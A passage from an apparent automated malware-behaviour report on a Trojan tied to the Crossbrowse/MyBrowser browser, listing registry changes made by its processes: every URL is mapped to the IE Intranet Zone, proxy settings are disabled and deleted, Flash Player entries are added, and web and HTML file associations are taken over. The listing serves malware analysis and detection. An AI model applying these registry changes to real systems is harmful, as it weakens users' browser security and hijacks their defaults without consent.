"BaseClass" = "Drive"
[HKLM\SOFTWARE\Crossbrowse]
"Preinstall" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Desktop" = "%Documents and Settings%\All Users\Desktop"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"
"Desktop" = "%Documents and Settings%\%current user%\Desktop"
[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
[HKCU\Software\CrossBrowser]
"Installation" = "1"
[HKCU\Software\Crossbrowse]
"Preinstall" = "1"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 1D 00 00 00 01 00 00 00 00 00 00 00"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Local AppData" = "%Documents and Settings%\%current user%\Local Settings\Application Data"
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "7E 22 74 55 27 E0 3C AF E0 EB D4 30 1D 68 9E 72"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"MigrateProxy" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"
The Trojan modifies IE security zone settings to map all local web nodes (hostnames without dots) that are not assigned to any zone to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"
The Trojan modifies IE security zone settings to map all web nodes that bypass the proxy to the Intranet Zone:
"ProxyBypass" = "1"
Proxy settings are disabled:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
The Trojan modifies IE security zone settings to map all URLs to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"
The Trojan deletes the following registry key(s):
[HKLM\SOFTWARE\Tempo]
The Trojan deletes the following value(s) in system registry:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
"ProxyServer"
"ProxyOverride"
The process chrome.exe:2304 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "86 64 4B A8 29 FD EA EF 2A F8 9A 97 29 57 A9 23"
The process chrome.exe:2268 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "50 C3 C4 EC 04 6A 3C 23 66 3A 29 9F B0 E7 23 CE"
The process chrome.exe:2216 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "DE 9E 04 10 1F 36 59 98 E9 F7 D8 2A 62 07 1C 40"
The process chrome.exe:1980 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "7C B3 A0 D8 2C 8A DC D5 DD CF C4 2F 08 04 E3 66"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Local AppData" = "%Documents and Settings%\%current user%\Local Settings\Application Data"
[HKCU\Software\Chromium]
"usagestats" = "0"
"_NumAccounts" = "1"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\ServiceCtlGuid]
"Guid" = "0c5a3172-2248-44fd-b9a6-8389cb1dc56a"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Desktop" = "%Documents and Settings%\%current user%\Desktop"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\CtlGuid]
"BitNames" = " DOT11_ASSOCIATE DOT11_ROAMING DOT11_1X DOT11_PNP DOT11_SCAN DOT11_RECEIVE DOT11_SEND DOT11_IOCTL DOT11_OID DOT11_MISC DOT11_UPCALL DOT11_KEYMGR DOT11_PEER DOT11_SOFTAP DOT11_PAM DOT11_REPEATER DOT11_APROUTER DOT11_WME DOT11_CONFIG DOT11_MSM DOT11_MSM_ADAPT DOT11_MSM_SCAN DOT11_MSM_CONNECT DOT11_MSM_SECURITY_PKT DOT11_NOTIFY_OBJECT"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\DiagL2SecCtlGuid]
"Guid" = "2e8d9ec5-a712-48c4-8ce0-631eb0c1cd65"
[HKCU\Software\Chromium]
"_NumSignedIn" = "0"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\WDiagCoreCtlGuid]
"BitNames" = " WD_LOG_FLAG_INIT WD_LOG_FLAG_RPC WD_LOG_FLAG_EVENT WD_LOG_FLAG_INTERFACE WD_LOG_FLAG_CONNECTION WD_LOG_FLAG_CONTROL WD_LOG_FLAG_LOCKS WD_LOG_FLAG_MEMORY WD_LOG_FLAG_REFERENCES WD_LOG_FLAG_FUNCTION_TRACE WD_LOG_FLAG_ASSERT"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Personal" = "%Documents and Settings%\%current user%\My Documents"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing]
"ControlFlags" = "1"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\WDiagCoreCtlGuid]
"Guid" = "637a0f36-dff5-4b2f-83dd-b106c1c725e2"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\ServiceCtlGuid]
"BitNames" = " DOT11_AUTOCONF DOT11_AUTOCONF_CLIENT DOT11_AUTOCONF_UI DOT11_FATMSM DOT11_COMMON DOT11_WLANGPA DOT11_CLASS_COINSTALLER"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing]
"Active" = "1"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\WLanDiagCtlGuid]
"BitNames" = " WLANHC_AUTOCONFIG WLANHC_RNWFMSM WLANHC_FATMSM WLANHC_DLLMAIN WLANHC_TEST"
"Guid" = "6da4ddca-0901-4bae-9ad4-7e6030bab531"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing]
"LogSessionName" = "stdout"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\CtlGuid]
"Guid" = "d905ac1c-65e7-4242-99ea-fe66a8355df8"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\DiagL2SecCtlGuid]
"BitNames" = " SECHC_LOG_FLAG_ASSERT SECHC_LOG_FLAG_INIT SECHC_LOG_FLAG_DIAG SECHC_LOG_FLAG_ONEX_DIAG SECHC_LOG_FLAG_REPAIR SECHC_LOG_FLAG_STATE SECHC_LOG_FLAG_EXT SECHC_LOG_FLAG_EVENT_LOG SECHC_LOG_FLAG_FUNCTION SECHC_LOG_FLAG_MEMORY SECHC_LOG_FLAG_LOCKS"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
The Trojan deletes the following registry key(s):
[HKLM\SOFTWARE\Microsoft\PCHealth\ErrorReporting\DW]
The Trojan deletes the following value(s) in system registry:
[HKLM\SOFTWARE\Microsoft\PCHealth\ErrorReporting\DW]
"DWFileTreeRoot"
The process chrome.exe:2252 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "33 0D B1 17 4A 1B 1D D1 BA 36 7F 95 C3 A2 EF 69"
The process nsq21.tmp:168 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
"Cookies" = "%Documents and Settings%\%current user%\Cookies"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"
[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 1E 00 00 00 01 00 00 00 00 00 00 00"
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "3D 0E FD D6 4D 3A C1 62 1C F6 4F 9C 45 66 DB B7"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"MigrateProxy" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"
The Trojan modifies IE security zone settings to map all local web nodes without dots that are not assigned to any zone to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"
The Trojan modifies IE security zone settings to map all web nodes that bypass the proxy to the Intranet Zone:
"ProxyBypass" = "1"
Proxy settings are disabled:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
The Trojan modifies IE security zone settings to map all URLs to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"
The Trojan deletes the following value(s) in system registry:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
"ProxyServer"
"ProxyOverride"
The process nso13.tmp:508 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "0F 6D F5 DD F2 1F 66 FB 4F EB 85 68 96 BF 04 5A"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
The process 6481.exe:1988 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
[HKLM\SOFTWARE\Crossbrowse]
"Preinstall" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"
[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
[HKCU\Software\Crossbrowse]
"Preinstall" = "1"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 1F 00 00 00 01 00 00 00 00 00 00 00"
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "45 12 6B 3B 47 93 71 4E B1 66 55 0C 08 15 4C F9"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"MigrateProxy" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"
The Trojan modifies IE security zone settings to map all local web nodes without dots that are not assigned to any zone to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"
The Trojan modifies IE security zone settings to map all web nodes that bypass the proxy to the Intranet Zone:
"ProxyBypass" = "1"
Proxy settings are disabled:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
The Trojan modifies IE security zone settings to map all URLs to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"
The Trojan deletes the following value(s) in system registry:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
"ProxyServer"
"ProxyOverride"
The process tmp25.tmp:3448 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Macromedia\FlashPlayerPepperReleaseType]
"Release" = "1"
[HKLM\SOFTWARE\Macromedia\FlashPlayerPepper]
"UninstallerPath" = "%System%\Macromed\Flash\FlashUtil32_18_0_0_209_pepper.exe"
"Version" = "18.0.0.209"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Adobe Flash Player PPAPI]
"UninstallString" = "%System%\Macromed\Flash\FlashUtil32_18_0_0_209_pepper.exe -maintain pepperplugin"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 21 00 00 00 01 00 00 00 00 00 00 00"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
[HKLM\SOFTWARE\Macromedia\FlashPlayerPepper]
"isScriptDebugger" = "0"
[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Adobe Flash Player PPAPI]
"NoRepair" = "1"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Adobe Flash Player PPAPI]
"URLUpdateInfo" = "http://www.adobe.com/go/getflashplayer/"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"
[HKCU\Software\Microsoft\Direct3D\MostRecentApplication]
"Name" = "tmp25.tmp"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Adobe Flash Player PPAPI]
"EstimatedSize" = "18748"
"HelpLink" = "http://www.adobe.com/go/flashplayer_support/"
"NoModify" = "1"
"URLInfoAbout" = "http://www.adobe.com"
"VersionMinor" = "0"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\FlashUtil32_18_0_0_209_pepper.exe]
"DisableExceptionChainValidation" = "0"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Adobe Flash Player PPAPI]
"DisplayVersion" = "18.0.0.209"
"DisplayName" = "Adobe Flash Player 18 PPAPI"
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "2D EB 7C 00 89 35 00 8C 11 89 CB 0A 3C 14 95 F4"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Adobe Flash Player PPAPI]
"VersionMajor" = "18"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"MigrateProxy" = "1"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"
[HKLM\SOFTWARE\Macromedia\FlashPlayerPepper]
"PlayerPath" = "%System%\Macromed\Flash\pepflashplayer32_18_0_0_209.dll"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Adobe Flash Player PPAPI]
"Publisher" = "Adobe Systems Incorporated"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Control Panel\Extended Properties\{2CA4F306-B280-4ab2-B5E1-1DFA3583F046}\%System%]
"FlashPlayerCPLApp.cpl" = "10"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Adobe Flash Player PPAPI]
"RequiresIESysFile" = "4.70.0.1155"
"DisplayIcon" = "%System%\Macromed\Flash\FlashUtil32_18_0_0_209_pepper.exe"
The Trojan modifies IE security zone settings to map all local web nodes without dots that are not assigned to any zone to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"
The Trojan modifies IE security zone settings to map all web nodes that bypass the proxy to the Intranet Zone:
"ProxyBypass" = "1"
Proxy settings are disabled:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
The Trojan modifies IE security zone settings to map all URLs to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"
The Trojan deletes the following value(s) in system registry:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
[HKCU\Software\Macromedia\FlashPlayer]
"ConflictingProcs"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyServer"
"ProxyOverride"
[HKCU\Software\Macromedia\FlashPlayer]
"RerunInUIMode"
The process setup.exe:576 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Clients\StartMenuInternet\MyBrowser\InstallInfo]
"IconsVisible" = "1"
[HKCU\Software\Classes\ftp\shell]
"(Default)" = "open"
[HKLM\SOFTWARE\Clients\StartMenuInternet\MyBrowser\DefaultIcon]
"(Default)" = "%Program Files%\MyBrowser\MyBrowser\Application\mybrowser.exe,0"
[HKLM\SOFTWARE\MyBrowser\Installer]
"Name" = "MyBrowser"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Start Menu" = "%Documents and Settings%\All Users\Start Menu"
[HKLM\SOFTWARE\Clients\StartMenuInternet\MyBrowser\Capabilities]
"ApplicationDescription" = "MyBrowser is a web browser that runs webpages and applications with lightning speed. It's fast, stable, and easy to use. Browse the web more safely with malware and phishing protection built into MyBrowser."
[HKLM\SOFTWARE\Clients\StartMenuInternet\MyBrowser\Capabilities\URLAssociations]
"smsto" = "CRSBRWSHTML"
[HKCR\https\shell\open\command]
"(Default)" = "%Program Files%\MyBrowser\MyBrowser\Application\mybrowser.exe -- %1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\MyBrowser]
"DisplayIcon" = "%Program Files%\MyBrowser\MyBrowser\Application\mybrowser.exe,0"
[HKLM\SOFTWARE\MyBrowser\Installer]
"UninstallArguments" = " --uninstall --system-level"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\MyBrowser]
"VersionMinor" = "95"
[HKCR\.html\OpenWithProgids]
"CRSBRWSHTML" = ""
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\MyBrowser]
"DisplayVersion" = "39.5.2171.95"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Start Menu" = "%Documents and Settings%\%current user%\Start Menu"
[HKLM\SOFTWARE\Clients\StartMenuInternet\MyBrowser\Capabilities]
"ApplicationName" = "MyBrowser"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\MyBrowser]
"InstallDate" = "20151029"
[HKCU\Software\Classes\http\shell\open\ddeexec]
"(Default)" = ""
[HKLM\SOFTWARE\Microsoft\Active Setup\Installed Components]
"StubPath" = "%Program Files%\MyBrowser\MyBrowser\Application\39.5.2171.95\Installer\chrmstp.exe --configure-user-settings --verbose-logging --system-level"
[HKCR\.html]
"(Default)" = "CRSBRWSHTML"
[HKCU\Software\Classes\ftp]
"URL Protocol" = ""
[HKLM\SOFTWARE\Clients\StartMenuInternet\MyBrowser\Capabilities\URLAssociations]
"nntp" = "CRSBRWSHTML"
[HKLM\SOFTWARE\Clients\StartMenuInternet\MyBrowser\Capabilities\FileAssociations]
".xhtml" = "CRSBRWSHTML"
[HKLM\SOFTWARE\Clients\StartMenuInternet\MyBrowser\Capabilities\URLAssociations]
"mailto" = "CRSBRWSHTML"
[HKCU\Software\Classes\.xht]
"(Default)" = "CRSBRWSHTML"
[HKCU\Software\Classes\ftp\shell\open\command]
"(Default)" = "%Program Files%\MyBrowser\MyBrowser\Application\mybrowser.exe -- %1"
[HKLM\System\CurrentControlSet\Control\Session Manager]
"PendingFileRenameOperations" = "\??\%Program Files%\MyBrowser\MyBrowser,"
[HKCU\Software\Classes\.html]
"(Default)" = "CRSBRWSHTML"
[HKCU\Software\Classes\ftp\DefaultIcon]
"(Default)" = "%Program Files%\MyBrowser\MyBrowser\Application\mybrowser.exe,0"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\MyBrowser]
"VersionMajor" = "2171"
[HKCU\Software\Classes\.shtml]
"(Default)" = "CRSBRWSHTML"
[HKCU\Software\Classes\https\shell\open\ddeexec]
"(Default)" = ""
[HKLM\SOFTWARE\Clients\StartMenuInternet\MyBrowser\shell\open\command]
"(Default)" = "%Program Files%\MyBrowser\MyBrowser\Application\mybrowser.exe"
[HKCR\CLSID\{2A563926-CF4B-4363-A760-F71E46205B7E}\LocalServer32]
"(Default)" = "%Program Files%\MyBrowser\MyBrowser\Application\39.5.2171.95\delegate_execute.exe"
[HKCR\CLSID\{2A563926-CF4B-4363-A760-F71E46205B7E}]
"(Default)" = "CommandExecuteImpl Class"
[HKLM\SOFTWARE\Clients\StartMenuInternet\MyBrowser\Capabilities\URLAssociations]
"irc" = "CRSBRWSHTML"
[HKCR\ftp\DefaultIcon]
"(Default)" = "%Program Files%\MyBrowser\MyBrowser\Application\mybrowser.exe,0"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Personal" = "%Documents and Settings%\%current user%\My Documents"
[HKLM\SOFTWARE\Clients\StartMenuInternet\MyBrowser\Capabilities\URLAssociations]
"https" = "CRSBRWSHTML"
[HKLM\SOFTWARE\Microsoft\Active Setup\Installed Components]
"IsInstalled" = "1"
"Version" = "24,0,0,0"
[HKCR\https\shell]
"(Default)" = "open"
[HKCR\.xhtml]
"(Default)" = "CRSBRWSHTML"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\mybrowser.exe]
"(Default)" = "%Program Files%\MyBrowser\MyBrowser\Application\mybrowser.exe"
[HKCR\.xht\OpenWithProgids]
"CRSBRWSHTML" = ""
[HKLM\SOFTWARE\Clients\StartMenuInternet\MyBrowser\Capabilities\Startmenu]
"StartMenuInternet" = "MyBrowser"
[HKCU\Software\Classes\http\DefaultIcon]
"(Default)" = "%Program Files%\MyBrowser\MyBrowser\Application\mybrowser.exe,0"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
